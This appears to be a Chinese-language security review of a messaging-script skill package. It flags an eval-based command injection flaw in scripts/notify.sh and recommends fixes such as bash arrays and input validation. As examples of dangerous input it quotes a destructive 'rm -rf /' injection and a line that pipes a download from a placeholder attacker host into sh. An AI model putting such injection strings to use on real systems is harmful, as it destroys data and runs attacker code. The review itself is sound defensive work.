Cross Platform Messenger Claw

这是一个与描述相符的“跨渠道推送”脚本包，但有实质性安全注意事项： - 主要风险：scripts/notify.sh 使用 eval 在 shell 中执行由参数拼接出的命令字符串，会导致命令注入。如果消息内容或目标来自不受信任的输入（例如用户输入的文本或外部文件），攻击者可注入并执行任意命令。示例危险输入："; rm -rf / # 或 $(curl http://attacker/x|sh)"。 - 建议在安装/运行前采取以下措施： 1) 不要在自动化环境中直接传入未消毒的外部数据到 --message/targets。先用白名单或转义限制目标格式（例如严格验证电话号码/ID 格式）。 2) 将脚本修复为不使用 eval：在构建命令时保持为 bash 数组并以 "${cmd[@]}" 执行，或直接调用 openclaw 命令而不是构造并 eval 字符串。举例： - 避免: cmd=$(build_cmd "$target") && eval "$cmd" - 更好: 在 send_one 中直接构造数组 cmd=(openclaw message send --channel ... ) 然后执行 "${cmd[@]}"。 3) 使用 --dry-run 先验证要发送的参数输出；在批量/cron 场景下先在安全环境中测试。 4) 明确凭据来源：确认 OpenClaw CLI 已正确且安全地配置各渠道的 API keys/tokens，且这些凭据存放位置和访问权限符合最小权限原则。 - 如果你是维护者：在 README/SKILL.md 中补充对凭据配置的说明，修复脚本以消除 eval，并添加输入验证与日志/失败处理。 基于以上不安全的执行方式和文档不完整性，我建议在修复脚本（去掉 eval、增加输入验证）并补充凭据配置说明前，将该技能视为有风险并谨慎部署。